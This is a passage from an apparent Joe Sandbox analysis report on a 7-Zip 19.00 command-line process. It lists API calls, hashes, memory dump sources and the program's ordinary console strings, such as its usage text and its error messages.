                                                                • Opcode Fuzzy Hash: 324205b252e1547a146404fd684db01b8975b469ffccedc29f4d10e25dad08a8
                                                                • Instruction Fuzzy Hash: 4CD1CF32218A80D6CB28EF25E4803DEB762F7D5B94F544135EE9A47B69DF39C985CB00
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \$\\?\$\\?\UNC\
                                                                • API String ID: 0-1962706685
                                                                • Opcode ID: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
                                                                • Instruction ID: dc6f98bbf873793611a5ceb2f03ee340f8f69851f07e1bd7ae71e66aad935f8b
                                                                • Opcode Fuzzy Hash: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
                                                                • Instruction Fuzzy Hash: 26B1522260A540A0CE1CFF21D4615EEAB20EFA27D4F885132FA5E47769DF79C9C6C712
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00111C98
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00111CB9
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast
                                                                • String ID:
                                                                • API String ID: 1452528299-0
                                                                • Opcode ID: 4011904a981b9cc7d5110702b517e72b43359cd785bba75f51c38677a1bb3970
                                                                • Instruction ID: c66d7bed7d7e7fd27b715654212b1fbd22ce88a77026f502863b341450d94a3a
                                                                • Opcode Fuzzy Hash: 4011904a981b9cc7d5110702b517e72b43359cd785bba75f51c38677a1bb3970
                                                                • Instruction Fuzzy Hash: 2BA1822264964491CB28EF15E4905EEE721E7E67D0F941232FB9E47B69DF38C8D6CB00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs$free$fputc
                                                                • String ID: Error:$ file$Everything is Ok$Scan WARNINGS for files and folders:$Scan WARNINGS: $WARNING: Cannot open $WARNINGS for files:
                                                                • API String ID: 2662072562-1527772849
                                                                • Opcode ID: cf38ecbc90f80cce91f4804fd03da9a44f36afd14dcff60acdae5e80679d7744
                                                                • Instruction ID: 4c1f07cafd6d6f9d1e3ffa40e167a46dab75b3825dface6ab85d0874f8063727
                                                                • Opcode Fuzzy Hash: cf38ecbc90f80cce91f4804fd03da9a44f36afd14dcff60acdae5e80679d7744
                                                                • Instruction Fuzzy Hash: B4517276304940C6DE24EB21DA913EE6322F7A5BD5F844125EE6A0B669DF3CC999C380
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmove
                                                                • String ID:
                                                                • API String ID: 1534225298-0
                                                                • Opcode ID: 487434742999afad6c6a49a55d089b6f01de136bf747d36331bc54ee911b7c32
                                                                • Instruction ID: 4166d52ac8177bef333f5be0d1ea038dd0f77d0f99fa480240cbe85704987230
                                                                • Opcode Fuzzy Hash: 487434742999afad6c6a49a55d089b6f01de136bf747d36331bc54ee911b7c32
                                                                • Instruction Fuzzy Hash: 7F716422219AC0A1CA24EB25E8517DEA720F7D77D0F545222FF9E577A9DF38C586C700
                                                                APIs
                                                                • free.MSVCRT ref: 0014187D
                                                                  • Part of subcall function 00112130: malloc.MSVCRT ref: 00112134
                                                                  • Part of subcall function 00112130: _CxxThrowException.MSVCRT ref: 0011214F
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ExceptionThrowfreemalloc
                                                                • String ID:
                                                                • API String ID: 2861928636-0
                                                                • Opcode ID: fc3a67dbef3549b613e96df0c000b572b71572800cf79d164be4322c4d64f1de
                                                                • Instruction ID: db0de8fa133b3db8a894caa14e85d34f21fba6fc942bed3f8ada6d545f492841
                                                                • Opcode Fuzzy Hash: fc3a67dbef3549b613e96df0c000b572b71572800cf79d164be4322c4d64f1de
                                                                • Instruction Fuzzy Hash: A1815B32209BC891CA64DF26E450BAE7764F7EBB84F455122DB8E53B25CF38C496C704
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 604b93e9740048c82800e9d74cf7720333369c55d8207d772f7bb48edf82253e
                                                                • Instruction ID: 72e723d4649d7876c2b7b7741854fb6c01e0a50f109ddaaf8d43deb2489ada3b
                                                                • Opcode Fuzzy Hash: 604b93e9740048c82800e9d74cf7720333369c55d8207d772f7bb48edf82253e
                                                                • Instruction Fuzzy Hash: 0231C52261198095CA59FE36DC522EC6320EBA2F95F1D0272EF2D5F369CF30C8A68354
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmove
                                                                • String ID: 2$3$?$?$Z
                                                                • API String ID: 1534225298-3338962022
                                                                • Opcode ID: 84abab613373cf7922060763a3c287b9f684fa76ebb682cbcf5688f653a5ccb0
                                                                • Instruction ID: 1529072b3d1c5f5afa9149c689a1d091452f741b7330bdb540c515d8ccb33af5
                                                                • Opcode Fuzzy Hash: 84abab613373cf7922060763a3c287b9f684fa76ebb682cbcf5688f653a5ccb0
                                                                • Instruction Fuzzy Hash: 19C1C57335568092CE34EB25E4905AEB771F7E5B84F914222EA9E43739DF38C986C701
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: ca853514d698da322178c764a93f6451d2681f45a97f5268fbff0ab336d04f61
                                                                • Instruction ID: 41ee2623e94c498a14a387632b3e35e14daa22ce3a64c9288ab458b12908fd82
                                                                • Opcode Fuzzy Hash: ca853514d698da322178c764a93f6451d2681f45a97f5268fbff0ab336d04f61
                                                                • Instruction Fuzzy Hash: 82511D33702A9499CB19EE36D4946AD6320FB96F95B1D4272DF2E1B718CF38C965C310
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$wcscmp
                                                                • String ID: ..\
                                                                • API String ID: 4021281200-2756224523
                                                                • Opcode ID: 7888456042c53789908d25aad9b3813a7becaf42d114683dbdf658571ea549be
                                                                • Instruction ID: 8125ce3e15e5244aa305c33bfbc88a2a011f852f377d5bb36ecd66fa1cc1de85
                                                                • Opcode Fuzzy Hash: 7888456042c53789908d25aad9b3813a7becaf42d114683dbdf658571ea549be
                                                                • Instruction Fuzzy Hash: 59618F22714A8096CE24EF16F49126EB720FBE6B94F590135EF5E1B768DF78C942C700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs$free$fputc
                                                                • String ID: Modified: $Path: $Size:
                                                                • API String ID: 2662072562-3207571042
                                                                • Opcode ID: 496fa3ffaf823c2aebc81c865e07b2af86b11c6c8c3a8b9c12195a7aa1bd88ef
                                                                • Instruction ID: 2b31320029cfea5376249d5f6dfc06725eff79ab98751b0d0dfa4f13e1c89300
                                                                • Opcode Fuzzy Hash: 496fa3ffaf823c2aebc81c865e07b2af86b11c6c8c3a8b9c12195a7aa1bd88ef
                                                                • Instruction Fuzzy Hash: F1214F76204D01D1EE14EF25EE903ED2321BB9ABE9F448226EE3D076A4DF38C55AC300
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 73dc987ccbc96a76fd053137d80cd1e85e68fdadf62f71c117497fccd2584006
                                                                • Instruction ID: d3bb3e11707ee42a7bdf5fccfbb8b0eeeb2ad34e66d8e6285665d2194d52247a
                                                                • Opcode Fuzzy Hash: 73dc987ccbc96a76fd053137d80cd1e85e68fdadf62f71c117497fccd2584006
                                                                • Instruction Fuzzy Hash: DEC1932235958092CB28EF65E4801EEA770F7DAB80F944132EB4E53B69DF39C9D5CB41
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmove$ExceptionThrow
                                                                • String ID: Incorrect volume size:
                                                                • API String ID: 3957182552-1799541332
                                                                • Opcode ID: 4436e24a10e8fc572d61ba3777d2b135a9ae8f78e93ce841be10de43e0223506
                                                                • Instruction ID: 7d0373ca1168a530500dc64c6262b8cc6c5b4f8e79b7a87a409bb56a2b4266a7
                                                                • Opcode Fuzzy Hash: 4436e24a10e8fc572d61ba3777d2b135a9ae8f78e93ce841be10de43e0223506
                                                                • Instruction Fuzzy Hash: 50518172204A8492DF29EF25E8903EDB320F799B84F844222DB9D47766DF38C5A5C740
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: c96e70f305775fe2be644aefe5c3f32861bae157b673a4b6227a1bbf3ac5cc1e
                                                                • Instruction ID: ad8700e67e85118c397b2c93f0faa353a89f75b040e9732a002ade5d38c71f4c
                                                                • Opcode Fuzzy Hash: c96e70f305775fe2be644aefe5c3f32861bae157b673a4b6227a1bbf3ac5cc1e
                                                                • Instruction Fuzzy Hash: 41715132208A4091DB18EF25E8503AE7761FB95BD4F481232EF5E877A9DF38C5A6C340
                                                                APIs
                                                                  • Part of subcall function 0011339C: free.MSVCRT ref: 001133D7
                                                                  • Part of subcall function 0011339C: memmove.MSVCRT(00000000,?,?,00000000,001110A8), ref: 001133F2
                                                                • free.MSVCRT ref: 0011A90A
                                                                • free.MSVCRT ref: 0011A9AD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmove
                                                                • String ID: /$\
                                                                • API String ID: 1534225298-1600464054
                                                                • Opcode ID: f198c9d99514ce9e4ce6b0316728f7062312fdaa462ade4dde103b6963418a90
                                                                • Instruction ID: 39cb8f6124fb2c3e7fec4cc596c4fc62e6e7003df91a40a3b3c9a9509c6e9bea
                                                                • Opcode Fuzzy Hash: f198c9d99514ce9e4ce6b0316728f7062312fdaa462ade4dde103b6963418a90
                                                                • Instruction Fuzzy Hash: D0518312205640A18E2CEF21E5510FD6F20EFA67D4BC55131FB6E8766ADF28CACAC742
                                                                APIs
                                                                Strings
                                                                • Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values, xrefs: 00158640
                                                                • 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 00158630
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$fputs$memmove
                                                                • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values
                                                                • API String ID: 2337578458-4238946813
                                                                • Opcode ID: fc1f1692e1a7be690a265933f0a82059642291962d2ae098a8720eef4c07a75c
                                                                • Instruction ID: ef9140e060be3336dcd33e849d76bb521c859d79b3b870f9032ba42a82ec21cc
                                                                • Opcode Fuzzy Hash: fc1f1692e1a7be690a265933f0a82059642291962d2ae098a8720eef4c07a75c
                                                                • Instruction Fuzzy Hash: 86114C723156C0D6DB20DF15E9803AEB322B795B95F584122DF6D2B718CF38C89AC701
                                                                APIs
                                                                Strings
                                                                • The file operation error for listfile, xrefs: 0011FF71
                                                                • Cannot find listfile, xrefs: 0011FF12
                                                                • Incorrect item in listfile.Check charset encoding and -scs switch., xrefs: 0011FFDA, 0012000E
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$ExceptionThrow
                                                                • String ID: Cannot find listfile$Incorrect item in listfile.Check charset encoding and -scs switch.$The file operation error for listfile
                                                                • API String ID: 4001284683-1604901869
                                                                • Opcode ID: 96405dd8fb92279f030b02bc931f9dc36b9c89402a3ea1ebc254a3a14f5713aa
                                                                • Instruction ID: 765b94633e8d49036989ae0fe448dfc1f93ef9448b18f27e804e9a2e2cd578a1
                                                                • Opcode Fuzzy Hash: 96405dd8fb92279f030b02bc931f9dc36b9c89402a3ea1ebc254a3a14f5713aa
                                                                • Instruction Fuzzy Hash: E951D47231868192DA21DF11F89079FB721F7AA7D0F900226FF9903A59DF79C946CB00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$ErrorLast
                                                                • String ID:
                                                                • API String ID: 408039514-0
                                                                • Opcode ID: 56e310f5247428a7174e856c66c809f8f157f3f47fc266d476a18a669d8f27e7
                                                                • Instruction ID: ca786d9a7f2cf4a2c68b9d436df1a5b5029236eb17787972ecf3c39c9f7dc156
                                                                • Opcode Fuzzy Hash: 56e310f5247428a7174e856c66c809f8f157f3f47fc266d476a18a669d8f27e7
                                                                • Instruction Fuzzy Hash: C251882221C94092DA18EB24E4915EEA770EBE6790F541232F79E437F9DF74C9C6CB10
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs
                                                                • String ID: = $ERROR$ERRORS:$WARNING$WARNINGS:
                                                                • API String ID: 1795875747-2836439314
                                                                • Opcode ID: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
                                                                • Instruction ID: ea75f1bdabd0b898937c0c00f4b31ea1238855aa9f725ff2e37dfbc5bbf3caad
                                                                • Opcode Fuzzy Hash: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
                                                                • Instruction Fuzzy Hash: 8711B1B6300940D2FB25DF26ED847986721B719BC6F048022DF680BA60DF39CAADC300
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs$free
                                                                • String ID: $ MB$ Memory =
                                                                • API String ID: 3873070119-2616823926
                                                                • Opcode ID: 07695d8419c59f003fa7f84926a4645375bf0ceb04becd9a3de262dbf0bc1305
                                                                • Instruction ID: bea527ee6f49570b761fb52f512e8450a7e54b633ed571bc924852dacec043d7
                                                                • Opcode Fuzzy Hash: 07695d8419c59f003fa7f84926a4645375bf0ceb04becd9a3de262dbf0bc1305
                                                                • Instruction Fuzzy Hash: 5A111FB2204D01D1EB10DF25ED403AA6330F794BE6F449226EE6E476A4DF38C95AC340
                                                                APIs
                                                                • fputs.MSVCRT ref: 001530E7
                                                                • fputs.MSVCRT ref: 00153104
                                                                • fputs.MSVCRT ref: 00153114
                                                                  • Part of subcall function 00112320: free.MSVCRT ref: 0011237E
                                                                  • Part of subcall function 00112320: fputs.MSVCRT ref: 001123B8
                                                                  • Part of subcall function 00112320: free.MSVCRT ref: 001123C4
                                                                • fputs.MSVCRT ref: 00153132
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs$free
                                                                • String ID: : Can not open the file as [$ERROR$Open $WARNING$] archive
                                                                • API String ID: 3873070119-2741933734
                                                                • Opcode ID: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
                                                                • Instruction ID: e19b3c9496b75ff441ee7456c2170ae11d7cd9f6fd2cd832072fde47c91fa7df
                                                                • Opcode Fuzzy Hash: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
                                                                • Instruction Fuzzy Hash: 03F0E7B5300E05D1EE149F66ED943D96326BB99FD5F849026EE6E073649F3DC54AC300
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: c6c1dfda41fa0d06ad42f95544832c1263e566194fcfacdfad1f80fd41ef587c
                                                                • Instruction ID: 6fdcee4645c2d07f984bd1f5dcb0c170d6ab191924ffc71e48c8b9a0a5102e27
